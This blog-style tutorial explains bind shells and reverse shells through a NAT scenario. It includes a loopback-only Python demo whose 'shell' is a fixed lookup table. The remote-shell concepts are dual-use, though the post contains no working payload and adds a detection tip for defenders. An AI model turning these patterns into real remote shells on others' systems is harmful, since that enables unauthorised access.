Let us see the basic differences between a bind shell and a reverse shell..
What is a Shell
A shell is software that acts as an intermediary between the user and the
kernel. It gives the user an interface through which the services of the
kernel can be accessed.
Eg: Bash shell, cmd.exe, etc.
+-----------------+                     _______________                   +----------------+
|     Aneesh      |   Behind NAT       /              /                   |    Shabbir     |
| With Private ip | ----> ----> ----> /   Internet   / ----> ----> ----> | with Public IP |
+-----------------+                  /______________/                     +----------------+
OK, so in this scenario Aneesh has a computer connected to the internet
with a private IP (no hosting), while Shabbir is connected to the internet
with a public IP (hosted). That basically means Shabbir's system can be
accessed by anyone connected to the internet, but the same doesn't go for
Aneesh: Aneesh's system, being behind NAT, cannot be directly connected to
by other machines on the internet.
Bind Shell
Let's suppose Shabbir has encountered some problem with his system and
needs some help from Aneesh. He simply binds his shell (cmd.exe or
/bin/bash) to a specific port and sends Aneesh the port number and other
details. In this scenario Aneesh can simply connect to Shabbir's machine
and get the shell! So in this case:
Aneesh's end: connect to Shabbir (acts as a client)
Shabbir's end: listen for connections (act as a server and bind his command shell to a port on the network)
Reverse Shell
Now let's suppose that after some days Aneesh screws up his system and
asks Shabbir for help. In this case a bind shell cannot be used, as
Aneesh doesn't have a public IP and his system is not reachable publicly!
To get around this problem, Aneesh uses the one direction that still works:
his machine can make outbound connections even though nobody can connect in,
so he sends his command prompt out to Shabbir. So, in this case:
Aneesh's end: bind his shell and send it to Shabbir over the network (connect, acting as the client)
Shabbir's end: listen for connections and respond to them (act as the server)
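To make the two sections above concrete, here is an added example (not code from the original article) that plays both patterns out on the loopback interface with two threads standing in for Aneesh's and Shabbir's machines. The "shell" is a constructed lookup table (FAKE_SHELL) rather than cmd.exe or /bin/bash, so the only thing the demo exercises is the direction of the connection: in bind_shell_pattern the shell host listens and the helper connects in, in reverse_shell_pattern the helper listens and the shell host connects out. The role names "shell_host" and "helper" and the describe helper are assumptions made for this example.

```python
import socket
import threading

# Constructed stand-in for a real command shell (cmd.exe or /bin/bash): a fixed
# command table, so the demo shows only who listens and who connects.
FAKE_SHELL = {"whoami": "shabbir", "hostname": "shabbir-pc"}
LOOPBACK = "127.0.0.1"   # both "machines" live on this host for the demo


def answer_like_a_shell(conn):
    """Read one command line from the socket and reply from the fake table.

    This is the point where a real bind/reverse shell would hand the socket to
    a command interpreter; here the lookup table stands in for it."""
    cmd = conn.recv(1024).decode().strip()
    reply = FAKE_SHELL.get(cmd, "unknown command: " + cmd)
    conn.sendall((reply + "\n").encode())


def ask(sock, command):
    """Send one command line over an established socket and return the reply."""
    sock.sendall((command + "\n").encode())
    return sock.recv(1024).decode().strip()


def new_listener():
    """Listening TCP socket on an OS-chosen loopback port; returns (socket, port)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind((LOOPBACK, 0))      # port 0: let the OS pick a free port
    srv.listen(1)
    return srv, srv.getsockname()[1]


def bind_shell_pattern(command="whoami"):
    """Bind shell: the machine offering its shell (Shabbir) LISTENS with the shell
    bound to a port; the helper (Aneesh) CONNECTS in.
    Returns (who_listened, who_connected, reply)."""
    shell_host, port = new_listener()

    def shell_side():
        conn, _ = shell_host.accept()     # wait for the helper to connect in
        with conn:
            answer_like_a_shell(conn)

    worker = threading.Thread(target=shell_side)
    worker.start()
    with socket.create_connection((LOOPBACK, port)) as helper:   # Aneesh dials Shabbir
        reply = ask(helper, command)
    worker.join()
    shell_host.close()
    return ("shell_host", "helper", reply)


def reverse_shell_pattern(command="whoami"):
    """Reverse shell: the helper (Shabbir) LISTENS; the machine behind NAT (Aneesh)
    CONNECTS out and serves its shell over that outbound socket.
    Returns (who_listened, who_connected, reply)."""
    helper, port = new_listener()

    def shell_side():
        with socket.create_connection((LOOPBACK, port)) as out:  # Aneesh dials out
            answer_like_a_shell(out)

    worker = threading.Thread(target=shell_side)
    worker.start()
    conn, _ = helper.accept()           # Shabbir waits for Aneesh to call in
    with conn:
        reply = ask(conn, command)
    worker.join()
    helper.close()
    return ("helper", "shell_host", reply)


def describe(listener, connector):
    """Name the pattern from who listened and who connected, with the reachability
    consequence that decides which one can be used (assumed wording for this demo)."""
    if (listener, connector) == ("shell_host", "helper"):
        return "bind shell: inbound to the shell host, so it needs a public IP and an open inbound port"
    if (listener, connector) == ("helper", "shell_host"):
        return "reverse shell: outbound from the shell host, so only the helper must be reachable; works from behind NAT"
    return "unknown pattern"


if __name__ == "__main__":
    for run in (bind_shell_pattern, reverse_shell_pattern):
        listener, connector, reply = run("whoami")
        print(run.__name__, "->", listener, "listens,", connector, "connects; reply:", reply)
        print("   ", describe(listener, connector))
```

Both functions return the same reply for the same command; only the tuple of roles differs. That difference is exactly what the NAT in the diagram decides: a listener on the NAT'ed machine is unreachable, so only the reverse pattern, where the shell host makes the outbound connection, can be used from Aneesh's side. For a defender, the same fact cuts the other way: a reverse shell shows up as an unexpected outbound connection from the host, not as a new listening port.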
That's all for this article.. I hope the viewers like it..
1 comment:
very clearly, thanks for sharing guys
Please try to comment if I have done well or if you have finished learning from the blog.